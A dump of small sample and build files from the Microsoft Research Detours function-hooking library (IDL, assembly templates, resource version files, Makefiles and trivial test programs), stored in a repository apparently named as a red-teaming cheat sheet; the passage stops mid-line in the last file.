https://raw.githubusercontent.com/0xJs/RedTeaming_CheatSheet/dc0471476c0dbb52a0f23b503089fb28d6c2f903/coding/projects/Hooking/Detours/detours/samples/cping/cping.dat -------------------------------------------------------------------------------- /coding/projects/Hooking/Detours/detours/samples/cping/iping.idl: -------------------------------------------------------------------------------- 1 | ////////////////////////////////////////////////////////////////////////////// 2 | // 3 | // Module: iping.idl (cping.exe - COM Ping) 4 | // 5 | // Microsoft Research Detours Package 6 | // 7 | // Copyright (c) Microsoft Corporation. All rights reserved. 8 | // 9 | import "objidl.idl"; 10 | import "oaidl.idl"; 11 | import "oleidl.idl"; 12 | 13 | 14 | [object, uuid(decdbeef-d1ac-11d1-96bc-00aa00573fb0), pointer_default(unique)] 15 | interface IPing : IUnknown 16 | { 17 | HRESULT Ping(void); 18 | HRESULT PingToServer([in] LPSTR pszString); 19 | HRESULT PingToClient([out] LPSTR *ppszString); 20 | HRESULT PingToClientSize([in] ULONG cbOut); 21 | }; 22 | // 23 | ///////////////////////////////////////////////////////////////// End of File. 24 | -------------------------------------------------------------------------------- /coding/projects/Hooking/Detours/detours/samples/disas/unk.cpp: -------------------------------------------------------------------------------- 1 | ///////////////////////////////////////////////////////////////////////////// 2 | // 3 | // Detours Test Program (x86.asm of disas.exe) 4 | // 5 | // Microsoft Research Detours Package 6 | // 7 | // Copyright (c) Microsoft Corporation. All rights reserved. 8 | // 9 | 10 | static int value = 0; 11 | 12 | extern "C" void TestCodes() 13 | { 14 | value++; 15 | } 16 | -------------------------------------------------------------------------------- /coding/projects/Hooking/Detours/detours/samples/dtest/dtarge.rc: -------------------------------------------------------------------------------- 1 | ////////////////////////////////////////////////////////////////////////////// 2 | // 3 | // Version information for dtarge.rc. 4 | // 5 | // Microsoft Research Detours Package 6 | // 7 | // Copyright (c) Microsoft Corporation. All rights reserved. 8 | // 9 | 10 | #include "detver.h" 11 | 12 | #define VER_INTERNALNAME_STR "dtarge" DETOURS_STRINGIFY(DETOURS_BITS) 13 | #define VER_ORIGINALFILENAME_STR "dtarge" DETOURS_STRINGIFY(DETOURS_BITS) ".dll" 14 | #define VER_FILEDESCRIPTION_STR "Detours Test Module" 15 | #define VER_COMPANYNAME_STR "Microsoft Corporation" 16 | 17 | #include "common.ver" 18 | -------------------------------------------------------------------------------- /coding/projects/Hooking/Detours/detours/samples/dynamic_alloc/x64.asm: -------------------------------------------------------------------------------- 1 | ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; 2 | ;; 3 | ;; Detours Test Program 4 | ;; 5 | ;; Microsoft Research Detours Package 6 | ;; 7 | ;; Copyright (c) Microsoft Corporation. All rights reserved. 8 | ;; 9 | PUBLIC CodeTemplate 10 | PUBLIC CodeTemplate_End 11 | 12 | _TEXT SEGMENT 13 | 14 | CodeTemplate PROC 15 | nop 16 | nop 17 | mov rax, 0deadbeef00000000h 18 | nop 19 | ret 20 | CodeTemplate_End:: 21 | CodeTemplate ENDP 22 | 23 | _TEXT ENDS 24 | 25 | END 26 | -------------------------------------------------------------------------------- /coding/projects/Hooking/Detours/detours/samples/dynamic_alloc/x86.asm: -------------------------------------------------------------------------------- 1 | ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; 2 | ;; 3 | ;; Detours Test Program 4 | ;; 5 | ;; Microsoft Research Detours Package 6 | ;; 7 | ;; Copyright (c) Microsoft Corporation. All rights reserved. 8 | ;; 9 | .386 10 | .model flat,C 11 | 12 | PUBLIC CodeTemplate 13 | PUBLIC CodeTemplate_End 14 | 15 | _TEXT SEGMENT 16 | 17 | CodeTemplate PROC 18 | nop 19 | nop 20 | nop 21 | mov eax, 0deadbeefh 22 | nop 23 | nop 24 | nop 25 | ret 26 | CodeTemplate_End:: 27 | CodeTemplate ENDP 28 | 29 | _TEXT ENDS 30 | 31 | END 32 | -------------------------------------------------------------------------------- /coding/projects/Hooking/Detours/detours/samples/echo/echofx.rc: -------------------------------------------------------------------------------- 1 | ////////////////////////////////////////////////////////////////////////////// 2 | // 3 | // Version information for echofx.rc. 4 | // 5 | // Microsoft Research Detours Package 6 | // 7 | // Copyright (c) Microsoft Corporation. All rights reserved. 8 | // 9 | 10 | #include "detver.h" 11 | 12 | #define VER_INTERNALNAME_STR "echofx" DETOURS_STRINGIFY(DETOURS_BITS) 13 | #define VER_ORIGINALFILENAME_STR "echofx" DETOURS_STRINGIFY(DETOURS_BITS) ".dll" 14 | #define VER_FILEDESCRIPTION_STR "Detours Echo Interception Module" 15 | #define VER_COMPANYNAME_STR "Microsoft Corporation" 16 | 17 | #include "common.ver" 18 | -------------------------------------------------------------------------------- /coding/projects/Hooking/Detours/detours/samples/echo/echonul.cpp: -------------------------------------------------------------------------------- 1 | // 2 | // 3 | // 4 | #include 5 | 6 | int WINAPI Echo(PCSTR pszMsg) 7 | { 8 | int sum = 0; 9 | while (*pszMsg) { 10 | sum = sum + *pszMsg++; 11 | } 12 | return sum; 13 | } 14 | 15 | int main() 16 | { 17 | return 0; 18 | } 19 | -------------------------------------------------------------------------------- /coding/projects/Hooking/Detours/detours/samples/echo/main.cpp: -------------------------------------------------------------------------------- 1 | // 2 | // 3 | // 4 | #include 5 | 6 | int WINAPI Echo(PCSTR pszMsg); 7 | 8 | extern "C" int __stdcall mainCRTStartup(HINSTANCE hInstance, 9 | HINSTANCE hPrevInstance, 10 | LPSTR lpCmdLine, 11 | int nCmdShow 12 | ) 13 | { 14 | (void)hInstance; 15 | (void)hPrevInstance; 16 | (void)lpCmdLine; 17 | (void)nCmdShow; 18 | 19 | Echo("Hello World"); 20 | Echo("Goodbye World"); 21 | 22 | return 0x99; 23 | } 24 | 25 | -------------------------------------------------------------------------------- /coding/projects/Hooking/Detours/detours/samples/excep/firstexc.h: -------------------------------------------------------------------------------- 1 | ////////////////////////////////////////////////////////////////////////////// 2 | // 3 | // Detours Test Program (firstexc.h of firstexc.exe) 4 | // 5 | // Microsoft Research Detours Package 6 | // 7 | // Copyright (c) Microsoft Corporation. All rights reserved. 8 | // 9 | 10 | #pragma once 11 | #ifndef _FIRSTEXC_H_ 12 | #define _FIRSTEXC_H_ 13 | 14 | /////////////////////////////////////////////// First Chance Exception Filter. 15 | // 16 | LPTOP_LEVEL_EXCEPTION_FILTER WINAPI 17 | DetourFirstChanceExceptionFilter(LPTOP_LEVEL_EXCEPTION_FILTER lpTopLevelFilter); 18 | 19 | #endif // _FIRSTEXC_H_ 20 | // 21 | //////////////////////////////////////////////////////////////// End of File. 22 | -------------------------------------------------------------------------------- /coding/projects/Hooking/Detours/detours/samples/findfunc/extend.rc: -------------------------------------------------------------------------------- 1 | ////////////////////////////////////////////////////////////////////////////// 2 | // 3 | // Version information for extend.rc. 4 | // 5 | // Microsoft Research Detours Package 6 | // 7 | // Copyright (c) Microsoft Corporation. All rights reserved. 8 | // 9 | 10 | #include "detver.h" 11 | 12 | #define VER_INTERNALNAME_STR "extend" DETOURS_STRINGIFY(DETOURS_BITS) 13 | #define VER_ORIGINALFILENAME_STR "extend" DETOURS_STRINGIFY(DETOURS_BITS) ".dll" 14 | #define VER_FILEDESCRIPTION_STR "Detours Dyanmic Interception Test Module" 15 | #define VER_COMPANYNAME_STR "Microsoft Corporation" 16 | 17 | #include "common.ver" 18 | -------------------------------------------------------------------------------- /coding/projects/Hooking/Detours/detours/samples/findfunc/findfunc.cpp: -------------------------------------------------------------------------------- 1 | ////////////////////////////////////////////////////////////////////////////// 2 | // 3 | // Detour Test Program (findfunc.cpp of findfunc.exe) 4 | // 5 | // Microsoft Research Detours Package 6 | // 7 | // Copyright (c) Microsoft Corporation. All rights reserved. 8 | // 9 | 10 | #include 11 | #include 12 | #include 13 | #include "target.h" 14 | 15 | int __cdecl main(void) 16 | { 17 | printf("findfunc.exe: Starting.\n"); 18 | fflush(stdout); 19 | 20 | printf("DLLs:\n"); 21 | for (HMODULE hModule = NULL; (hModule = DetourEnumerateModules(hModule)) != NULL;) { 22 | CHAR szName[MAX_PATH] = { 0 }; 23 | GetModuleFileNameA(hModule, szName, sizeof(szName) - 1); 24 | printf(" %p: %s\n", hModule, szName); 25 | } 26 | 27 | DWORD dwCount = 10000; 28 | for (int i = 0; i < 3; i++) { 29 | printf("findfunc.exe: Calling (%ld).\n", dwCount); 30 | dwCount = Target(dwCount) + 10000; 31 | } 32 | return 0; 33 | } 34 | // 35 | ///////////////////////////////////////////////////////////////// End of File. 36 | -------------------------------------------------------------------------------- /coding/projects/Hooking/Detours/detours/samples/findfunc/target.cpp: -------------------------------------------------------------------------------- 1 | ////////////////////////////////////////////////////////////////////////////// 2 | // 3 | // Detour Test Program (target.cpp of target.dll) 4 | // 5 | // Microsoft Research Detours Package 6 | // 7 | // Copyright (c) Microsoft Corporation. All rights reserved. 8 | // 9 | 10 | #include 11 | #include 12 | #include "target.h" 13 | 14 | extern "C" DWORD WINAPI Hidden(DWORD dwCount) 15 | { 16 | printf("target.dll: Hidden(%ld) -> %ld.\n", dwCount, dwCount + 1); 17 | return dwCount + 1; 18 | } 19 | 20 | // We use this point to ensure Hidden isn't inlined. 21 | static DWORD (WINAPI * SelfHidden)(DWORD dwCount) = Hidden; 22 | 23 | DWORD WINAPI Target(DWORD dwCount) 24 | { 25 | printf("target.dll: Target (%ld) -> %ld.\n", dwCount, dwCount + 100); 26 | dwCount = SelfHidden(dwCount + 100); 27 | printf("target.dll: Target (.....) -> %ld.\n", dwCount); 28 | return dwCount; 29 | } 30 | 31 | BOOL WINAPI DllMain(HINSTANCE hinst, DWORD dwReason, LPVOID reserved) 32 | { 33 | (void)hinst; 34 | (void)dwReason; 35 | (void)reserved; 36 | 37 | return TRUE; 38 | } 39 | 40 | // 41 | ///////////////////////////////////////////////////////////////// End of File. 42 | -------------------------------------------------------------------------------- /coding/projects/Hooking/Detours/detours/samples/findfunc/target.h: -------------------------------------------------------------------------------- 1 | ////////////////////////////////////////////////////////////////////////////// 2 | // 3 | // Detour Test Program (target.h of target.dll) 4 | // 5 | // Microsoft Research Detours Package 6 | // 7 | // Copyright (c) Microsoft Corporation. All rights reserved. 8 | // 9 | 10 | DWORD WINAPI Target(DWORD dwCount); 11 | 12 | // 13 | ///////////////////////////////////////////////////////////////// End of File. 14 | -------------------------------------------------------------------------------- /coding/projects/Hooking/Detours/detours/samples/findfunc/target.rc: -------------------------------------------------------------------------------- 1 | ////////////////////////////////////////////////////////////////////////////// 2 | // 3 | // Version information for target.rc. 4 | // 5 | // Microsoft Research Detours Package 6 | // 7 | // Copyright (c) Microsoft Corporation. All rights reserved. 8 | // 9 | 10 | #include "detver.h" 11 | 12 | #define VER_INTERNALNAME_STR "target" DETOURS_STRINGIFY(DETOURS_BITS) 13 | #define VER_ORIGINALFILENAME_STR "target" DETOURS_STRINGIFY(DETOURS_BITS) ".dll" 14 | #define VER_FILEDESCRIPTION_STR "Detours Test Module" 15 | #define VER_COMPANYNAME_STR "Microsoft Corporation" 16 | 17 | #include "common.ver" 18 | -------------------------------------------------------------------------------- /coding/projects/Hooking/Detours/detours/samples/member/Makefile: -------------------------------------------------------------------------------- 1 | ############################################################################## 2 | ## 3 | ## Makefile for Detours Test Programs. 4 | ## 5 | ## Microsoft Research Detours Package 6 | ## 7 | ## Copyright (c) Microsoft Corporation. All rights reserved. 8 | ## 9 | 10 | !include ..\common.mak 11 | 12 | LIBS=$(LIBS) kernel32.lib 13 | 14 | all: dirs \ 15 | $(BIND)\member.exe \ 16 | !IF $(DETOURS_SOURCE_BROWSING)==1 17 | $(OBJD)\member.bsc 18 | !ENDIF 19 | 20 | clean: 21 | -del *~ 2> nul 22 | -del $(BIND)\member.* 2> nul 23 | -rmdir /q /s $(OBJD) 2>nul 24 | 25 | realclean: clean 26 | -rmdir /q /s $(OBJDS) 2>nul 27 | 28 | dirs: 29 | @if not exist $(BIND) mkdir $(BIND) && echo. Created $(BIND) 30 | @if not exist $(OBJD) mkdir $(OBJD) && echo. Created $(OBJD) 31 | 32 | $(OBJD)\member.obj : member.cpp 33 | 34 | $(BIND)\member.exe : $(OBJD)\member.obj $(DEPS) 35 | cl $(CFLAGS) /Fe$@ /Fd$(@R).pdb $(OBJD)\member.obj \ 36 | /link $(LINKFLAGS) $(LIBS) /subsystem:console 37 | 38 | $(OBJD)\member.bsc : $(OBJD)\member.obj 39 | bscmake /v /n /o $@ $(OBJD)\member.sbr 40 | 41 | ############################################################################## 42 | 43 | test: $(BIND)\member.exe 44 | @echo. 45 | $(BIND)\member.exe 46 | @echo. 47 | 48 | ################################################################# End of File. 49 | -------------------------------------------------------------------------------- /coding/projects/Hooking/Detours/detours/samples/opengl/ogldet.rc: -------------------------------------------------------------------------------- 1 | ////////////////////////////////////////////////////////////////////////////// 2 | // 3 | // Version information for ogldet.rc. 4 | // 5 | // Microsoft Research Detours Package 6 | // 7 | // Copyright (c) Microsoft Corporation. All rights reserved. 8 | // 9 | 10 | #include "detver.h" 11 | 12 | #define VER_INTERNALNAME_STR "ogldet" DETOURS_STRINGIFY(DETOURS_BITS) 13 | #define VER_ORIGINALFILENAME_STR "ogldet" DETOURS_STRINGIFY(DETOURS_BITS) ".dll" 14 | #define VER_FILEDESCRIPTION_STR "Detours Open GL Test Module" 15 | #define VER_COMPANYNAME_STR "Microsoft Corporation" 16 | 17 | #include "common.ver" 18 | -------------------------------------------------------------------------------- /coding/projects/Hooking/Detours/detours/samples/opengl/testogl.cpp: -------------------------------------------------------------------------------- 1 | ////////////////////////////////////////////////////////////////////////////// 2 | // 3 | // File: testogl.cpp 4 | // Module: testogl.exe (oglsimple.dll) 5 | // 6 | 7 | #include 8 | #include 9 | #include 10 | 11 | int __cdecl main() 12 | { 13 | printf("testogl.exe: Starting\n"); 14 | fflush(stdout); 15 | 16 | glFinish(); 17 | 18 | printf("testogl.exe: done\n"); 19 | fflush(stdout); 20 | 21 | return 0; 22 | } 23 | // 24 | ///////////////////////////////////////////////////////////////// End of File. 25 | -------------------------------------------------------------------------------- /coding/projects/Hooking/Detours/detours/samples/region/Makefile: -------------------------------------------------------------------------------- 1 | ############################################################################## 2 | ## 3 | ## Makefile for Detours Test Programs. 4 | ## 5 | ## Microsoft Research Detours Package 6 | ## 7 | ## Copyright (c) Microsoft Corporation. All rights reserved. 8 | ## 9 | 10 | !include ..\common.mak 11 | 12 | LIBS=$(LIBS) kernel32.lib 13 | 14 | all: dirs \ 15 | $(BIND)\region.exe \ 16 | !IF $(DETOURS_SOURCE_BROWSING)==1 17 | $(OBJD)\region.bsc 18 | !ENDIF 19 | 20 | clean: 21 | -del *~ 2> nul 22 | -del $(BIND)\region.* 2> nul 23 | -rmdir /q /s $(OBJD) 2>nul 24 | 25 | realclean: clean 26 | -rmdir /q /s $(OBJDS) 2>nul 27 | 28 | dirs: 29 | @if not exist $(BIND) mkdir $(BIND) && echo. Created $(BIND) 30 | @if not exist $(OBJD) mkdir $(OBJD) && echo. Created $(OBJD) 31 | 32 | $(OBJD)\region.obj : region.cpp 33 | 34 | $(BIND)\region.exe : $(OBJD)\region.obj $(DEPS) 35 | cl $(CFLAGS) /Fe$@ /Fd$(@R).pdb $(OBJD)\region.obj \ 36 | /link $(LINKFLAGS) $(LIBS) /subsystem:console 37 | 38 | $(OBJD)\region.bsc : $(OBJD)\region.obj 39 | bscmake /v /n /o $@ $(OBJD)\region.sbr 40 | 41 | ############################################################################## 42 | 43 | test: $(BIND)\region.exe 44 | @echo. 45 | $(BIND)\region.exe 46 | @echo. 47 | 48 | ################################################################# End of File. 49 | -------------------------------------------------------------------------------- /coding/projects/Hooking/Detours/detours/samples/simple/simple.rc: -------------------------------------------------------------------------------- 1 | ////////////////////////////////////////////////////////////////////////////// 2 | // 3 | // Version information for simple.rc. 4 | // 5 | // Microsoft Research Detours Package 6 | // 7 | // Copyright (c) Microsoft Corporation. All rights reserved. 8 | // 9 | 10 | #include "detver.h" 11 | 12 | #define VER_INTERNALNAME_STR "simple" DETOURS_STRINGIFY(DETOURS_BITS) 13 | #define VER_ORIGINALFILENAME_STR "simple" DETOURS_STRINGIFY(DETOURS_BITS) ".dll" 14 | #define VER_FILEDESCRIPTION_STR "Detours Test Module" 15 | #define VER_COMPANYNAME_STR "Microsoft Corporation" 16 | 17 | #include "common.ver" 18 | -------------------------------------------------------------------------------- /coding/projects/Hooking/Detours/detours/samples/simple/sleep5.cpp: -------------------------------------------------------------------------------- 1 | ////////////////////////////////////////////////////////////////////////////// 2 | // 3 | // Detours Test Program (sleep5.cpp of sleep5.exe) 4 | // 5 | // Microsoft Research Detours Package 6 | // 7 | // Copyright (c) Microsoft Corporation. All rights reserved. 8 | // 9 | 10 | #include 11 | #include 12 | #include 13 | 14 | int __cdecl main(int argc, char ** argv) 15 | { 16 | if (argc == 2) { 17 | Sleep(atoi(argv[1]) * 1000); 18 | } 19 | else { 20 | printf("sleep5.exe: Starting.\n"); 21 | 22 | Sleep(5000); 23 | 24 | printf("sleep5.exe: Done sleeping.\n"); 25 | } 26 | return 0; 27 | } 28 | // 29 | ///////////////////////////////////////////////////////////////// End of File. 30 | -------------------------------------------------------------------------------- /coding/projects/Hooking/Detours/detours/samples/slept/dslept.rc: -------------------------------------------------------------------------------- 1 | ////////////////////////////////////////////////////////////////////////////// 2 | // 3 | // Version information for dslept.rc. 4 | // 5 | // Microsoft Research Detours Package 6 | // 7 | // Copyright (c) Microsoft Corporation. All rights reserved. 8 | // 9 | 10 | #include "detver.h" 11 | 12 | #define VER_INTERNALNAME_STR "dslept" DETOURS_STRINGIFY(DETOURS_BITS) 13 | #define VER_ORIGINALFILENAME_STR "dslept" DETOURS_STRINGIFY(DETOURS_BITS) ".dll" 14 | #define VER_FILEDESCRIPTION_STR "Detours Sleep Interception Module" 15 | #define VER_COMPANYNAME_STR "Microsoft Corporation" 16 | 17 | #include "common.ver" 18 | -------------------------------------------------------------------------------- /coding/projects/Hooking/Detours/detours/samples/slept/slept.h: -------------------------------------------------------------------------------- 1 | ////////////////////////////////////////////////////////////////////////////// 2 | // 3 | // Detour Test Program (slept.h of slept.dll) 4 | // 5 | // Microsoft Research Detours Package 6 | // 7 | // Copyright (c) Microsoft Corporation. All rights reserved. 8 | // 9 | 10 | DWORD WINAPI UntimedSleepEx(DWORD dwMilliseconds, BOOL bAlertable); 11 | DWORD WINAPI TimedSleepEx(DWORD dwMilliseconds, BOOL bAlertable); 12 | DWORD WINAPI GetSleptTicks(VOID); 13 | DWORD WINAPI TestTicks(VOID); 14 | DWORD WINAPI TestTicksEx(DWORD Add); 15 | 16 | // 17 | ///////////////////////////////////////////////////////////////// End of File. 18 | -------------------------------------------------------------------------------- /coding/projects/Hooking/Detours/detours/samples/slept/slept.rc: -------------------------------------------------------------------------------- 1 | ////////////////////////////////////////////////////////////////////////////// 2 | // 3 | // Version information for sleep.rc. 4 | // 5 | // Microsoft Research Detours Package 6 | // 7 | // Copyright (c) Microsoft Corporation. All rights reserved. 8 | // 9 | 10 | #include "detver.h" 11 | 12 | #define VER_INTERNALNAME_STR "sleep" DETOURS_STRINGIFY(DETOURS_BITS) 13 | #define VER_ORIGINALFILENAME_STR "sleep" DETOURS_STRINGIFY(DETOURS_BITS) ".dll" 14 | #define VER_FILEDESCRIPTION_STR "Detours Sleep Test Module" 15 | #define VER_COMPANYNAME_STR "Microsoft Corporation" 16 | 17 | #include "common.ver" 18 | -------------------------------------------------------------------------------- /coding/projects/Hooking/Detours/detours/samples/talloc/tdll1x.cpp: -------------------------------------------------------------------------------- 1 | ////////////////////////////////////////////////////////////////////////////// 2 | // 3 | // Detours Test Program (tdll1x.cpp of talloc.exe/tdll1x.dll) 4 | // 5 | // Microsoft Research Detours Package 6 | // 7 | // Copyright (c) Microsoft Corporation. All rights reserved. 8 | // 9 | 10 | //////////////////////////////////////////////////////////////////// DLL Stuff 11 | // 12 | __declspec(dllexport) unsigned long __stdcall Dll1Function(unsigned long Value) 13 | { 14 | return Value + 1; 15 | } 16 | 17 | ///////////////////////////////////////////////////////////////// End of File. 18 | -------------------------------------------------------------------------------- /coding/projects/Hooking/Detours/detours/samples/talloc/tdll2x.cpp: -------------------------------------------------------------------------------- 1 | ////////////////////////////////////////////////////////////////////////////// 2 | // 3 | // Detours Test Program (tdll2x.cpp of talloc.exe/tdll2x.dll) 4 | // 5 | // Microsoft Research Detours Package 6 | // 7 | // Copyright (c) Microsoft Corporation. All rights reserved. 8 | // 9 | 10 | //////////////////////////////////////////////////////////////////// DLL Stuff 11 | // 12 | __declspec(dllexport) unsigned long __stdcall Dll2Function(unsigned long Value) 13 | { 14 | return Value + 1; 15 | } 16 | 17 | ///////////////////////////////////////////////////////////////// End of File. 18 | -------------------------------------------------------------------------------- /coding/projects/Hooking/Detours/detours/samples/talloc/tdll3x.cpp: -------------------------------------------------------------------------------- 1 | ////////////////////////////////////////////////////////////////////////////// 2 | // 3 | // Detours Test Program (tdll3x.cpp of talloc.exe/tdll3x.dll) 4 | // 5 | // Microsoft Research Detours Package 6 | // 7 | // Copyright (c) Microsoft Corporation. All rights reserved. 8 | // 9 | 10 | //////////////////////////////////////////////////////////////////// DLL Stuff 11 | // 12 | __declspec(dllexport) unsigned long __stdcall Dll3Function(unsigned long Value) 13 | { 14 | return Value + 1; 15 | } 16 | 17 | ///////////////////////////////////////////////////////////////// End of File. 18 | -------------------------------------------------------------------------------- /coding/projects/Hooking/Detours/detours/samples/talloc/tdll4x.cpp: -------------------------------------------------------------------------------- 1 | ////////////////////////////////////////////////////////////////////////////// 2 | // 3 | // Detours Test Program (tdll4x.cpp of talloc.exe/tdll4x.dll) 4 | // 5 | // Microsoft Research Detours Package 6 | // 7 | // Copyright (c) Microsoft Corporation. All rights reserved. 8 | // 9 | 10 | //////////////////////////////////////////////////////////////////// DLL Stuff 11 | // 12 | __declspec(dllexport) unsigned long __stdcall Dll4Function(unsigned long Value) 13 | { 14 | return Value + 1; 15 | } 16 | 17 | ///////////////////////////////////////////////////////////////// End of File. 18 | -------------------------------------------------------------------------------- /coding/projects/Hooking/Detours/detours/samples/talloc/tdll5x.cpp: -------------------------------------------------------------------------------- 1 | ////////////////////////////////////////////////////////////////////////////// 2 | // 3 | // Detours Test Program (tdll5x.cpp of talloc.exe/tdll5x.dll) 4 | // 5 | // Microsoft Research Detours Package 6 | // 7 | // Copyright (c) Microsoft Corporation. All rights reserved. 8 | // 9 | 10 | //////////////////////////////////////////////////////////////////// DLL Stuff 11 | // 12 | __declspec(dllexport) unsigned long __stdcall Dll5Function(unsigned long Value) 13 | { 14 | return Value + 1; 15 | } 16 | 17 | ///////////////////////////////////////////////////////////////// End of File. 18 | -------------------------------------------------------------------------------- /coding/projects/Hooking/Detours/detours/samples/talloc/tdll6x.cpp: -------------------------------------------------------------------------------- 1 | ////////////////////////////////////////////////////////////////////////////// 2 | // 3 | // Detours Test Program (tdll6x.cpp of talloc.exe/tdll6x.dll) 4 | // 5 | // Microsoft Research Detours Package 6 | // 7 | // Copyright (c) Microsoft Corporation. All rights reserved. 8 | // 9 | 10 | //////////////////////////////////////////////////////////////////// DLL Stuff 11 | // 12 | __declspec(dllexport) unsigned long __stdcall Dll6Function(unsigned long Value) 13 | { 14 | return Value + 1; 15 | } 16 | 17 | ///////////////////////////////////////////////////////////////// End of File. 18 | -------------------------------------------------------------------------------- /coding/projects/Hooking/Detours/detours/samples/talloc/tdll7x.cpp: -------------------------------------------------------------------------------- 1 | ////////////////////////////////////////////////////////////////////////////// 2 | // 3 | // Detours Test Program (tdll7x.cpp of talloc.exe/tdll7x.dll) 4 | // 5 | // Microsoft Research Detours Package 6 | // 7 | // Copyright (c) Microsoft Corporation. All rights reserved. 8 | // 9 | 10 | //////////////////////////////////////////////////////////////////// DLL Stuff 11 | // 12 | __declspec(dllexport) unsigned long __stdcall Dll7Function(unsigned long Value) 13 | { 14 | return Value + 1; 15 | } 16 | 17 | ///////////////////////////////////////////////////////////////// End of File. 18 | -------------------------------------------------------------------------------- /coding/projects/Hooking/Detours/detours/samples/talloc/tdll8x.cpp: -------------------------------------------------------------------------------- 1 | ////////////////////////////////////////////////////////////////////////////// 2 | // 3 | // Detours Test Program (tdll8x.cpp of talloc.exe/tdll8x.dll) 4 | // 5 | // Microsoft Research Detours Package 6 | // 7 | // Copyright (c) Microsoft Corporation. All rights reserved. 8 | // 9 | 10 | //////////////////////////////////////////////////////////////////// DLL Stuff 11 | // 12 | __declspec(dllexport) unsigned long __stdcall Dll8Function(unsigned long Value) 13 | { 14 | return Value + 1; 15 | } 16 | 17 | ///////////////////////////////////////////////////////////////// End of File. 18 | -------------------------------------------------------------------------------- /coding/projects/Hooking/Detours/detours/samples/talloc/tdll9x.cpp: -------------------------------------------------------------------------------- 1 | ////////////////////////////////////////////////////////////////////////////// 2 | // 3 | // Detours Test Program (tdll9x.cpp of talloc.exe/tdll9x.dll) 4 | // 5 | // Microsoft Research Detours Package 6 | // 7 | // Copyright (c) Microsoft Corporation. All rights reserved. 8 | // 9 | 10 | //////////////////////////////////////////////////////////////////// DLL Stuff 11 | // 12 | __declspec(dllexport) unsigned long __stdcall Dll9Function(unsigned long Value) 13 | { 14 | return Value + 1; 15 | } 16 | 17 | ///////////////////////////////////////////////////////////////// End of File. 18 | -------------------------------------------------------------------------------- /coding/projects/Hooking/Detours/detours/samples/traceapi/trcapi.rc: -------------------------------------------------------------------------------- 1 | ////////////////////////////////////////////////////////////////////////////// 2 | // 3 | // Version information for trcapi.rc. 4 | // 5 | // Microsoft Research Detours Package 6 | // 7 | // Copyright (c) Microsoft Corporation. All rights reserved. 8 | // 9 | 10 | #include "detver.h" 11 | 12 | #define VER_INTERNALNAME_STR "trcapi" DETOURS_STRINGIFY(DETOURS_BITS) 13 | #define VER_ORIGINALFILENAME_STR "trcapi" DETOURS_STRINGIFY(DETOURS_BITS) ".dll" 14 | #define VER_FILEDESCRIPTION_STR "Detours Win32 API Tracing Module" 15 | #define VER_COMPANYNAME_STR "Microsoft Corporation" 16 | 17 | #include "common.ver" 18 | -------------------------------------------------------------------------------- /coding/projects/Hooking/Detours/detours/samples/tracebld/trcbld.rc: -------------------------------------------------------------------------------- 1 | ////////////////////////////////////////////////////////////////////////////// 2 | // 3 | // Version information for trcbld.rc. 4 | // 5 | // Microsoft Research Detours Package 6 | // 7 | // Copyright (c) Microsoft Corporation. All rights reserved. 8 | // 9 | 10 | #include "detver.h" 11 | 12 | #define VER_INTERNALNAME_STR "trcbld" DETOURS_STRINGIFY(DETOURS_BITS) 13 | #define VER_ORIGINALFILENAME_STR "trcbld" DETOURS_STRINGIFY(DETOURS_BITS) ".dll" 14 | #define VER_FILEDESCRIPTION_STR "Detours Build Tracing Module" 15 | #define VER_COMPANYNAME_STR "Microsoft Corporation" 16 | 17 | #include "common.ver" 18 | -------------------------------------------------------------------------------- /coding/projects/Hooking/Detours/detours/samples/tracelnk/trclnk.rc: -------------------------------------------------------------------------------- 1 | ////////////////////////////////////////////////////////////////////////////// 2 | // 3 | // Version information for trclnk.rc. 4 | // 5 | // Microsoft Research Detours Package 6 | // 7 | // Copyright (c) Microsoft Corporation. All rights reserved. 8 | // 9 | 10 | #include "detver.h" 11 | 12 | #define VER_INTERNALNAME_STR "trclnk" DETOURS_STRINGIFY(DETOURS_BITS) 13 | #define VER_ORIGINALFILENAME_STR "trclnk" DETOURS_STRINGIFY(DETOURS_BITS) ".dll" 14 | #define VER_FILEDESCRIPTION_STR "Detours Dynamic Linking Trace Module" 15 | #define VER_COMPANYNAME_STR "Microsoft Corporation" 16 | 17 | #include "common.ver" 18 | -------------------------------------------------------------------------------- /coding/projects/Hooking/Detours/detours/samples/tracemem/trcmem.rc: -------------------------------------------------------------------------------- 1 | ////////////////////////////////////////////////////////////////////////////// 2 | // 3 | // Version information for trcmem.rc. 4 | // 5 | // Microsoft Research Detours Package 6 | // 7 | // Copyright (c) Microsoft Corporation. All rights reserved. 8 | // 9 | 10 | #include "detver.h" 11 | 12 | #define VER_INTERNALNAME_STR "trcmem" DETOURS_STRINGIFY(DETOURS_BITS) 13 | #define VER_ORIGINALFILENAME_STR "trcmem" DETOURS_STRINGIFY(DETOURS_BITS) ".dll" 14 | #define VER_FILEDESCRIPTION_STR "Detours Memory Trace Module" 15 | #define VER_COMPANYNAME_STR "Microsoft Corporation" 16 | 17 | #include "common.ver" 18 | -------------------------------------------------------------------------------- /coding/projects/Hooking/Detours/detours/samples/tracereg/trcreg.rc: -------------------------------------------------------------------------------- 1 | ////////////////////////////////////////////////////////////////////////////// 2 | // 3 | // Version information for trcreg.rc. 4 | // 5 | // Microsoft Research Detours Package 6 | // 7 | // Copyright (c) Microsoft Corporation. All rights reserved. 8 | // 9 | 10 | #include "detver.h" 11 | 12 | #define VER_INTERNALNAME_STR "trcreg" DETOURS_STRINGIFY(DETOURS_BITS) 13 | #define VER_ORIGINALFILENAME_STR "trcreg" DETOURS_STRINGIFY(DETOURS_BITS) ".dll" 14 | #define VER_FILEDESCRIPTION_STR "Detours Registry Trace Module" 15 | #define VER_COMPANYNAME_STR "Microsoft Corporation" 16 | 17 | #include "common.ver" 18 | -------------------------------------------------------------------------------- /coding/projects/Hooking/Detours/detours/samples/traceser/trcser.rc: -------------------------------------------------------------------------------- 1 | ////////////////////////////////////////////////////////////////////////////// 2 | // 3 | // Version information for trcser.rc. 4 | // 5 | // Microsoft Research Detours Package 6 | // 7 | // Copyright (c) Microsoft Corporation. All rights reserved. 8 | // 9 | 10 | #include "detver.h" 11 | 12 | #define VER_INTERNALNAME_STR "trcser" DETOURS_STRINGIFY(DETOURS_BITS) 13 | #define VER_ORIGINALFILENAME_STR "trcsrc" 